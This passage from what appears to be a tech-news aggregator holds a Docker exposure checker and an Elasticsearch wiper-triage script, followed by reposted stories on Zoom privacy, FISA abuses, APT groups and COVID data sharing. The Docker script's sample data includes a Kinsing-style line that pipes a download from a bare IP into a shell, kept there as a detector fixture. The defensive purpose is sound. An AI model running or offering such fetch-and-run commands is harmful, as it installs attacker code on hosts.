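        cfg = rec.get("Config", {})
        cmd = " ".join((cfg.get("Entrypoint") or []) + (cfg.get("Cmd") or []))
        reasons = []
        if PIPE_TO_SHELL.search(cmd):
            reasons.append("pipes a download into a shell")
        if RAW_IP_URL.search(cmd):
            reasons.append("downloads from a bare IP address")
        if KEEPALIVE.search(cmd):
            reasons.append("tail -f /dev/null keep-alive")
        if reasons:
            hits.append({"name": rec.get("Name", "").lstrip("/"),
                         "image": cfg.get("Image", ""),
                         "cmd": cmd,
                         "reasons": reasons})
    return hits


# --- constructed sample data (not from a real host) ------------------------
EXPOSED_DAEMON = {"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}
HARDENED_DAEMON = {
    "hosts": ["unix:///var/run/docker.sock", "tcp://127.0.0.1:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
}
SAMPLE_INSPECT = [
    {"Name": "/kinsing-launcher", "Config": {"Image": "ubuntu", "Cmd": [
        "/bin/bash", "-c",
        "apt-get update && apt-get install -y wget cron;service cron start; "
        "wget -q -O - 142.44.191.122/d.sh | sh;tail -f /dev/null"]}},
    {"Name": "/installer", "Config": {"Image": "alpine", "Cmd": [
        "sh", "-c", "curl -sSf https://example.invalid/install.sh | sh"]}},
    {"Name": "/web", "Config": {"Image": "nginx", "Cmd": ["nginx", "-g", "daemon off;"]}},
]

if __name__ == "__main__":
    for label, cfg in (("exposed", EXPOSED_DAEMON), ("hardened", HARDENED_DAEMON)):
        print(label, daemon_exposure(cfg) or ["no findings"])
    for hit in suspicious_containers(SAMPLE_INSPECT):
        print(hit["name"], hit["image"], "->", "; ".join(hit["reasons"]))
```

On a live host you would feed `daemon_exposure` the parsed contents of /etc/docker/daemon.json and the arguments from the dockerd process, and `suspicious_containers` the JSON from `docker inspect $(docker ps -q)`. The container check is a heuristic: a legitimate installer that curls a script into sh trips it too, which is why the reasons are reported separately rather than collapsed into a single verdict.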

Source: If you don’t cover your Docker daemon API port you’ll have a hell of a time… because cryptocreeps are hunting for it • The Register

Facebook asks users about coronavirus symptoms, releases friendship data to researchers

Facebook Inc said on Monday it would start surveying some U.S. users about their health as part of a Carnegie Mellon University research project aimed at generating “heat maps” of self-reported coronavirus infections.

The social media giant will display a link at the top of users’ News Feeds directing them to the survey, which the researchers say will help them predict where medical resources are needed. Facebook said it may make surveys available to users in other countries too, if the approach is successful.

Alphabet Inc’s Google, Facebook’s rival in mobile advertising, began querying users for the Carnegie Mellon project last month through its Opinion Rewards app, which exchanges responses to surveys from Google and its clients for app store credit.

Facebook said in a blog post that the Carnegie Mellon researchers “won’t share individual survey responses with Facebook, and Facebook won’t share information about who you are with the researchers.”

The company also said it would begin making new categories of data available to epidemiologists through its Disease Prevention Maps program, which is sharing aggregated location data with partners in 40 countries working on COVID-19 response.

Researchers use the data to provide daily updates on how people are moving around in different areas to authorities in those countries, along with officials in a handful of U.S. cities and states.

In addition to location data, the company will begin making available a “social connectedness index” showing the probability that people in different locations are Facebook friends, aggregated at the zip code level.

Laura McGorman, who runs Facebook’s Data for Good program, said the index could be used to assess the economic impact of the new coronavirus, revealing which communities are most likely to get help from neighboring areas and others that may need more targeted support.

New “co-location maps” can similarly reveal the probability that people in one area will come in contact with people in another, Facebook said.

Source: Facebook asks users about coronavirus symptoms, releases friendship data to researchers – Reuters

This might actually be a good way to use all that privacy invading data

China’s Winnti group stayed under the radar for a decade by aiming for Linux servers

A group of hackers operating as an offshoot of China’s Winnti group managed to stay undetected for more than a decade by going open source.

A report from BlackBerry outlines how the group, actually a collection of five smaller crews of hackers thought to be state-sponsored, assembled in the wake of Winnti and exploited Linux servers, plus the occasional Windows Server box and mobile device, for years.

“The APT groups examined in this report have traditionally pursued different objectives and focused on a wide array of targets,” BlackBerry noted.

“However, it was observed that there is a significant degree of coordination between these groups, particularly where targeting of Linux platforms is concerned, and it is assessed that any organization with a large Linux distribution should not assume they are outside of the target sets for any of these groups.”

First chronicled by researchers back in 2013, the Winnti hacking operation is thought to date back as far as 2009. These groups, described by BlackBerry as “offshoots” of that hacking outfit, have been around for nearly as long and use similar tactics.

Part of the reason the attacks have gone unnoticed for so long, BlackBerry reckons, is the groups’ preference for Linux servers. The hackers are believed to use three different backdoors, two rootkits, and two other build tools that can be used to construct additional rootkits on a per-target basis for open-source servers.

This is in addition to the command-and-control tools and what is described as a “massive botnet” of compromised Linux servers and devices. Some of the malware has been in use dating back to 2012.

Source: Want to stay under the radar for a decade or more? This Chinese hacking crew did it… by aiming for Linux servers • The Register

American schools are banning Zoom and switching to Microsoft Teams

After many schools adopted Zoom to conduct online lessons during the coronavirus lockdown, concerns about security and privacy have led to a ban on the video conferencing software across the US.

The chancellor of New York City’s Department of Education Richard A Carranza sent an email to school principals telling them to “cease using Zoom as soon as possible”. And he is not alone; schools in other parts of the country have taken similar action, and educators are now being trained to use Microsoft Teams as this has been suggested as a suitable alternative, partly because it is compliant with FERPA (Family Educational Rights and Privacy Act).


Large numbers of teachers spent time learning how to use Zoom to continue educating pupils who are confined to their homes. But growing criticism of Zoom for its approach to privacy and security has given cause for a rethink. Documents seen by Chalkbeat show that principals in NYC have been told: “Based on the DOE’s review of those documented concerns, the DOE will no longer permit the use of Zoom at this time”.

The Washington Post quotes Danielle Filson, spokesperson for the NYC Education Department, as saying:

Providing a safe and secure remote learning experience for our students is essential, and upon further review of security concerns, schools should move away from using Zoom as soon as possible. There are many new components to remote learning, and we are making real-time decisions in the best interest of our staff and student. We will support staff and students in transitioning to different platforms such as Microsoft Teams that have the same capabilities with appropriate security measures in place.

The Post also reports that Clark County Public Schools in Nevada were also moving away from Zoom, saying in a statement that the decision had been taken to “disable access to Zoom out of an abundance of caution due to instances of hacking that created unsafe environments for teachers and students”.

Schools in Utah, Washington state and beyond are also looking into Zoom alternatives.

Source: American schools are banning Zoom and switching to Microsoft Teams

Dr. Drew Pinsky Played Down COVID-19, Then Tries To DMCA Away The Evidence

Update: The full video is now back up and it’s even worse than the original clip we posted. It’s unclear if it went back up thanks to YouTube deciding it was fair use, or Pinsky removing the bogus takedown. Either way, watch it here:

Copyright system supporters keep insisting to me that copyright is never used for censorship, and yet over and over again we keep seeing examples that prove that wrong. The latest is Dr. Drew Pinsky, the somewhat infamous doctor and media personality, who has been one of the more vocal people in the media playing down the impact of the coronavirus. In a video that had gone viral on Twitter and YouTube, it showed many, many, many clips of Dr. Drew insisting that COVID-19 was similar to the flu, and that it wouldn’t be that bad. Assuming it hasn’t been taken down due to a bogus copyright claim, you can hopefully see it below:

As you can see, for well over a month, deep into March when it was blatantly obvious how serious COVID-19 was, he was playing down the threat. Beyond incorrectly comparing it to the flu (saying that it’s “way less virulent than the flu” on February 4th — by which time it was clearly way more virulent than the flu in China), he said the headlines should say “way less serious than influenza,” and he insisted that the lethality rate was probably around “0.02%” rather than the 2% being reported. On February 7th, he said your probability of “dying from coronavirus — much higher being hit by an asteroid.” He also mocked government officials for telling people to stay home, even at one point in March saying he was “angry” about a “press-induced panic.” On March 16th, the same day that the Bay Area in California shut down, he insisted that if you’re under 65 you have nothing to worry about, saying “it’s just like the flu.” This was not in the distant past. At one point, a caller to his show, again on March 16th, said that because it’s called COVID-19 that means there were at least 18 others of them, and that’s why no one should worry — and Drew appeared to agree, making it appear he didn’t even know that the 19 refers to the year, not the number of coronaviruses. And even though there are other coronaviruses out there, this one was way more infectious and deadly, so the caller’s point doesn’t matter anyway.

To give him a tiny bit of credit, on Saturday, Pinsky posted a series of choppy videos on Twitter in which he flat out said that he was wrong and that he was sorry for, and regretted, his earlier statements. He also claimed that he signed up to help in California and NY if he was needed. But, even that apology seems weak in the face of what else he said in those videos… and, more importantly, his actions. In terms of what he said, he kept saying that he always said to listen to Dr. Fauci and to listen to your public health officials. Amazingly, at one point in his apology video, he insists that he thinks the real reason why New York got hit so bad is because of hallways and trains. Yet, in the video above, at one point he literally mocks NYC Mayor de Blasio for telling people to avoid crowded trains, saying: “de Blasio told them not to ride the trains! So they’re not riding the trains! So I am! [guffaw] I mean, it’s ridiculous.”

Given that, it’s a bit difficult to take him seriously when he claims that all along he always said to listen to your public officials, when just a few weeks ago he was mocking them. Indeed, as multiple people have pointed out, the issue here isn’t so much that Pinsky was wrong — in the early days, when there wasn’t as much info, lots of people got things wrong about COVID-19 (though Pinsky kept it up way way after most others recognized how serious it was), but that he acted so totally sure about his opinions that this was nothing to worry about. It was the certainty with which he said what he said that was so much of the problem, including deep into it already being a pandemic with local officials warning people to stay home.

But, even worse, just as he was doing the right thing and mostly apologizing… he was trying to hide those earlier clips that made him look so, so, so bad. His organization began sending out DMCA notices. If you went to the original YouTube upload you got this:

That says: “This video is no longer available due to a copyright claim by Drew Pinsky Inc.” Now, some might argue that it was just some clueless staffer working for Dr. Drew sending off bogus DMCAs, or maybe an automated bot… but nope. Drew himself started tweeting nonsense about copyright law at people. I originally linked to that tweet, but sometime on Sunday, after thousands of people — including some of the most famous lawyers in the country — explained to him why it was nonsense, he deleted it. But I kept a screenshot:

That says, amazingly:

Infringing copywrite laws is a crime. Hang onto your retweets. Or erase to be safe.

The wrongness-to-words ratio in that tweet is pretty fucking astounding. First of all, the layup: it’s copyright, Drew, not copywrite. Make sure you know the name of the fucking law you’re abusing to censor someone before tossing it out there. Second, no, infringing copyright is not a crime. Yes, there is such a thing as criminal copyright infringement, but this ain’t it. Someone posting a video of you would be, at best, civil infringement. For it to be criminal, someone would have to be making copies for profit — like running a bootleg DVD factory or something. Someone posting a 2 minute clip of your nonsense is not that.

Most important, however, this isn’t even civil infringement, thanks to fair use. Putting up a 2 minute video showing a dozen or so clips of Drew making an ass of himself is not infringing. It’s classic fair use — especially given the topic at hand.

So it’s really difficult to believe that Drew is really owning up to his mistakes when at the same time he says he’s sorry, he’s actively working to abuse the law to try to silence people from highlighting his previous comments. Also, someone should point him to Lenz v. Universal in which a court said that before sending a takedown, you need to take fair use into consideration. It certainly appears that Drew hasn’t the foggiest idea how copyright law works, so it seems unlikely he considered fair use at all.

I certainly understand that he likely regrets his earlier comments. And I appreciate his willingness to admit that he was wrong. But to really take ownership of your previous errors, you shouldn’t then be working doubletime to try to delete them from the internet and hide them from view. That’s not taking ownership of your mistakes, that’s trying to sweep them under the rug.

Source: Dr. Drew Pinsky Played Down COVID-19, Then Tries To DMCA Away The Evidence | Techdirt

For the past five years, every FBI secret spy court request to snoop on Americans has sucked, says watchdog

Analysis: The FBI has not followed internal rules when applying to spy on US citizens for at least five years, according to an extraordinary report [PDF] by the Department of Justice’s inspector general.

The failure to follow so-called Woods Procedures, designed to make sure the FBI’s submissions for secret spying are correct, puts a question mark over more than 700 approved applications to intercept and log every phone call and email made by named individuals.

Under the current system, the Feds apply to the Foreign Intelligence Surveillance Court (FISC), which can then grant the investigative agency extraordinary spying powers. These can also be granted retroactively if the agency needs to move quickly.

Back in 2001, however, a number of FISA warrants were found to have been granted on unverified information, driving the creation of the Woods Procedures, named after the FBI official who drew them up, Michael Woods.

Following a review last year of one of those successful applications that targeted a Trump campaign staffer called Carter Page, the FBI was found to have made “fundamental and serious errors” in its application. Inspector general Michael Horowitz then expanded his review to another 29 applications dated from October 2014 to September 2019 out of a pool of over 700 and found the same problems in every single other case he looked at, pointing to a systemic problem.

As a result, more than five years’ worth of secret spying activities by the US government may be illegitimate. Horowitz found the same “basic and fundamental errors” in every application.

Unaccountable

The FISA Court has long been highlighted by critics as an unaccountable body with extraordinary powers. Except for very rare occasions, only one side – the government – can present its case to the judges and as a result the court has approved almost every application. The process is wide open to abuse, critics have argued, and so it turns out to have been the case.

The Woods Procedures include things like sufficient supporting documentation of any assertions, a second review of any facts and assertions, and a re-verification of facts whenever an extension is applied for. They are a check and balance on power.

“We do not have confidence that the FBI has executed its Woods Procedures in compliance with FBI policy,” the report states.

It says that it couldn’t review files for four of the 29 selected FISA applications because the FBI has not been able to locate them and, in three of these instances, did not know if the files ever existed.

All of the 25 applications reviewed had “inadequately supported facts,” and “FBI and NSD officials we interviewed indicated to us that there were no efforts by the FBI to use existing FBI and NSD oversight mechanisms.”

Ah yeah but it’s all fixed now

Somewhat amazingly, the FBI doesn’t dispute the findings. The inspector general provided his report to the FBI and prosecutors for their feedback, and appended their responses to the report.

Neither the Feds nor the Dept of Justice denies the assertion that the FBI has not followed its own rules. And both argue that recent proposed changes, prompted solely by the inspector general’s previous report and which critics assert do not go far enough, have effectively fixed the issues.

There is no mention in either response or in the inspector general’s report of what the implications are for the hundreds of people that have been subject to secret spying orders that allow federal agents to track everything that person does and says.

But then, there may not be any implications because under the FISA rules, the person subjected to the spying is not informed of the order against them, even when the spying is over. And they are not even entitled to know or see any evidence compiled against them as a result of the spying operation, even if they are charged as a result of the spying.

It is, in short, a sign that the FBI cannot be trusted to follow its own rules even when those rules apply to the most invasive powers it can be given.

Source: For the past five years, every FBI secret spy court request to snoop on Americans has sucked, says watchdog • The Register

Amazon says it fired a guy for breaking pandemic rules. Same guy who organized a staff protest over a lack of coronavirus protection

On Monday, Amazon fired Chris Smalls, a worker at its Staten Island, New York, warehouse, who had organized a protest demanding more protection for workers amid the coronavirus outbreak.

Smalls, in a statement, said, “Amazon would rather fire workers than face up to its total failure to do what it should to keep us, our families, and our communities safe. I am outraged and disappointed but I am not shocked. As usual, Amazon would rather sweep a problem under the rug than act to keep workers and working communities safe.”

Amazon spokesperson Kristen Kish denied the firing had anything to do with protected labor activity. “We did not terminate Mr Smalls’ employment for organizing a 15-person protest,” she said in an emailed statement. “We terminated his employment for putting the health and safety of others at risk and violations of his terms of his employment.”

Strike organizers have disputed Amazon’s attendance figures, claiming about 50 people walked out.

Kish said Smalls had received multiple warnings for violating social distancing guidelines and had been asked to remain home with pay for two weeks because he had been in the proximity of another worker confirmed to have COVID-19. By ignoring that instruction and coming on-site, she said, he was putting colleagues at risk.

Concern about health safety has spread across Amazon’s workforce. Workers at Amazon’s Whole Foods grocery chain on Tuesday staged a sick-out, demanding 2x hazard pay for working in stores where they may be exposed to coronavirus.

The company last month boosted pay for Amazon and Whole Foods hourly employees in the US and Canada by $2 an hour and £2 per hour for employees in the UK during the month of April. And it said it would double its hourly base rate – ranging from $17.50 to $23/hour at JFK8, its Staten Island warehouse – for overtime from March 16, 2020 through May 3, 2020. The company has also offered two weeks of pay for workers quarantined for coronavirus.

Source: Amazon says it fired a guy for breaking pandemic rules. Same guy who organized a staff protest over a lack of coronavirus protection • The Register

A Feature on Zoom Secretly Displayed Data From People’s LinkedIn Profiles

But what many people may not know is that, until Thursday, a data-mining feature on Zoom allowed some participants to surreptitiously have access to LinkedIn profile data about other users — without Zoom asking for their permission during the meeting or even notifying them that someone else was snooping on them.

The undisclosed data mining adds to growing concerns about Zoom’s business practices at a moment when public schools, health providers, employers, fitness trainers, prime ministers and queer dance parties are embracing the platform.

An analysis by The New York Times found that when people signed in to a meeting, Zoom’s software automatically sent their names and email addresses to a company system it used to match them with their LinkedIn profiles.

The data-mining feature was available to Zoom users who subscribed to a LinkedIn service for sales prospecting, called LinkedIn Sales Navigator. Once a Zoom user enabled the feature, that person could quickly and covertly view LinkedIn profile data — like locations, employer names and job titles — for people in the Zoom meeting by clicking on a LinkedIn icon next to their names.

The system did not simply automate the manual process of one user looking up the name of another participant on LinkedIn during a Zoom meeting. In tests conducted last week, The Times found that even when a reporter signed in to a Zoom meeting under pseudonyms — “Anonymous” and “I am not here” — the data-mining tool was able to instantly match him to his LinkedIn profile. In doing so, Zoom disclosed the reporter’s real name to another user, overriding his efforts to keep it private.

Reporters also found that Zoom automatically sent participants’ personal information to its data-mining tool even when no one in a meeting had activated it. This week, for instance, as high school students in Colorado signed in to a mandatory video meeting for a class, Zoom readied the full names and email addresses of at least six students — and their teacher — for possible use by its LinkedIn profile-matching tool, according to a Times analysis of the data traffic that Zoom sent to a student’s account.

The discoveries about Zoom’s data-mining feature echo what users have learned about the surveillance practices of other popular tech platforms over the last few years. The video-meeting platform that has offered a welcome window on American resiliency during the coronavirus — providing a virtual peek into colleagues’ living rooms, classmates’ kitchens and friends’ birthday celebrations — can reveal more about its users than they may realize.

“People don’t know this is happening, and that’s just completely unfair and deceptive,” Josh Golin, the executive director of the Campaign for a Commercial-Free Childhood, a nonprofit group in Boston, said of the data-mining feature. He added that storing the personal details of schoolchildren for nonschool purposes, without alerting them or obtaining a parent’s permission, was particularly troubling.

Source: A Feature on Zoom Secretly Displayed Data From People’s LinkedIn Profiles – The New York Times

A hacker has wiped, defaced more than 15,000 Elasticsearch servers

For the past two weeks, a hacker has been breaking into Elasticsearch servers that have been left open on the internet without a password and attempting to wipe their content, while also leaving the name of a cyber-security firm behind, trying to divert blame.

According to security researcher John Wethington, one of the people who saw this campaign unfolding and who aided ZDNet in this report, the first intrusions began around March 24.

The attacks appear to be carried out with the help of an automated script that scans the internet for Elasticsearch systems left unprotected, connects to the databases, attempts to wipe their content, and then creates a new empty index called nightlionsecurity.com.

The attacking script doesn’t appear to work in all instances, though, as the nightlionsecurity.com index is also present in databases where the content has been left intact.

However, on many Elasticsearch servers, the wiping behavior is obvious, as log entries simply cut off around recent dates, such as March 24, 25, 26, and so on. Due to the highly volatile nature of data stored inside Elasticsearch servers, it is hard to quantify the exact number of systems where data was deleted.
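The two symptoms described above, the leftover nightlionsecurity.com index and a daily log series that stops dead around 24 March, can both be read straight out of the cluster’s `_cat/indices` listing, which is also the first thing an unauthenticated scanner sees on an open cluster. The triage script below is an added example, not ZDNet’s, Night Lion’s or Elastic’s code. It parses the text of `GET /_cat/indices?v`, flags the defacement index, finds the most recent date-suffixed index, and reports daily indices that still exist but hold zero documents. The two `_cat` outputs, their index names and UUIDs are constructed for the example.

```python
"""Triage an Elasticsearch cluster for the March 2020 wiper campaign.

Given the text of `GET /_cat/indices?v` (which an open cluster serves over
plain HTTP to anyone, the attacker's scanner included) this reports:
  * whether the defacement index the campaign leaves behind is present;
  * the last day covered by date-suffixed log indices, and how far short of
    today that falls (the "log entries simply cut off" symptom);
  * daily indices that still exist but hold zero documents.
Both _cat outputs below are constructed for this example, not real clusters.
"""
import re
from datetime import date
from typing import Dict, List, Optional

IOC_INDEX = "nightlionsecurity.com"
# Matches the daily suffix of logstash-2020.03.24, filebeat-7.6.1-2020.03.24, ...
DAILY_SUFFIX = re.compile(r"(\d{4})\.(\d{2})\.(\d{2})$")


def parse_cat_indices(cat_output: str) -> List[Dict[str, str]]:
    """Turn `_cat/indices?v` text into one dict per index, keyed by header."""
    lines = [ln for ln in cat_output.strip().splitlines() if ln.strip()]
    header = lines[0].split()
    rows = []
    for line in lines[1:]:
        cols = line.split()
        if len(cols) != len(header):
            continue  # skip a malformed row rather than misalign its columns
        rows.append(dict(zip(header, cols)))
    return rows


def audit_indices(cat_output: str, today: date) -> dict:
    """Summarise wiper indicators from a `_cat/indices?v` listing."""
    rows = parse_cat_indices(cat_output)
    names = {r["index"] for r in rows}
    last_day: Optional[date] = None
    emptied = []
    for r in rows:
        m = DAILY_SUFFIX.search(r["index"])
        if not m:
            continue
        d = date(int(m.group(1)), int(m.group(2)), int(m.group(3)))
        if last_day is None or d > last_day:
            last_day = d
        if r.get("docs.count") == "0":
            emptied.append(r["index"])
    gap = (today - last_day).days if last_day else None
    # Heuristic verdict: the IOC index alone is not proof (the article notes
    # it also appears on clusters left intact), so require a data symptom too.
    # A gap of one day is normal before today's index has been created.
    likely = IOC_INDEX in names and ((gap or 0) > 1 or bool(emptied))
    return {
        "ioc_index_present": IOC_INDEX in names,
        "last_log_day": last_day,
        "days_missing": gap,
        "emptied_daily_indices": sorted(emptied),
        "likely_wiped": likely,
    }


# --- constructed `_cat/indices?v` output; names and UUIDs are made up ---------
WIPED = """\
health status index                 uuid                   pri rep docs.count docs.deleted store.size pri.store.size
green  open   logstash-2020.03.22   0bS0aC4mTaCt1ZQ9x6Ymog 1   0   412300     0            210.4mb    210.4mb
green  open   logstash-2020.03.23   fQ2Jr9kDS3mPb8w1cL0HgA 1   0   398811     0            204.1mb    204.1mb
green  open   logstash-2020.03.24   nX7u1aZpQyuE3k9dTwL2eQ 1   0   0          0            230b       230b
green  open   nightlionsecurity.com 8K3qWvM5RaeZ1pY0cNt6Vw 1   0   0          0            230b       230b
"""

INTACT = """\
health status index                 uuid                   pri rep docs.count docs.deleted store.size pri.store.size
green  open   logstash-2020.04.01   Zq1mR7tYSe2oLk8vPd3wNg 1   0   401223     0            199.8mb    199.8mb
green  open   logstash-2020.04.02   Hc5xB2nJQiKa9rT4uE6fMw 1   0   120551     0            61.3mb     61.3mb
green  open   nightlionsecurity.com 8K3qWvM5RaeZ1pY0cNt6Vw 1   0   0          0            230b       230b
"""

if __name__ == "__main__":
    for label, listing in (("wiped", WIPED), ("intact", INTACT)):
        print(label, audit_indices(listing, date(2020, 4, 2)))
```

Run against a real cluster, the listing would come from `curl -s http://HOST:9200/_cat/indices?v`; if that request succeeds with no credentials, the cluster has the same exposure the campaign is exploiting, whatever the audit says about its indices.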

Night Lion Security denies any involvement

In a Signal conversation with this reporter yesterday, Vinny Troia, the founder of Night Lion Security, denied that his company had anything to do with the ongoing attacks.

In an interview he gave DataBreaches.net on March 26, Troia said he believes the attack is being carried out by a hacker he has been tracking for years, and who is also the subject of a recently released book.

Source: A hacker has wiped, defaced more than 15,000 Elasticsearch servers | ZDNet

Zoom’s Flawed Encryption Linked to China

Meetings on Zoom, the increasingly popular video conferencing service, are encrypted using an algorithm with serious, well-known weaknesses, and sometimes using keys issued by servers in China, even when meeting participants are all in North America, according to researchers at the University of Toronto.

The researchers also found that Zoom protects video and audio content using a home-grown encryption scheme, that there is a vulnerability in Zoom’s “waiting room” feature, and that Zoom appears to have at least 700 employees in China spread across three subsidiaries. They conclude, in a report for the university’s Citizen Lab — widely followed in information security circles — that Zoom’s service is “not suited for secrets” and that it may be legally obligated to disclose encryption keys to Chinese authorities and “responsive to pressure” from them.

Source: Zoom’s Flawed Encryption Linked to China

Thousands of recorded Zoom Video Calls Left Exposed on Open Web

Thousands of personal Zoom videos have been left viewable on the open Web, highlighting the privacy risks to millions of Americans as they shift many of their personal interactions to video calls in an age of social distancing. From a report: Many of the videos appear to have been recorded through Zoom’s software and saved onto separate online storage space without a password. But because Zoom names every video recording in an identical way, a simple online search can reveal a long stream of videos that anyone can download and watch. Zoom videos are not recorded by default, though call hosts can choose to save them to Zoom servers or their own computers. There’s no indication that live-streamed videos or videos saved onto Zoom’s servers are publicly visible. But many participants in Zoom calls may be surprised to find their faces, voices and personal information exposed because a call host can record a large group call without participants’ consent.

Source: Thousands of Zoom Video Calls Left Exposed on Open Web – Slashdot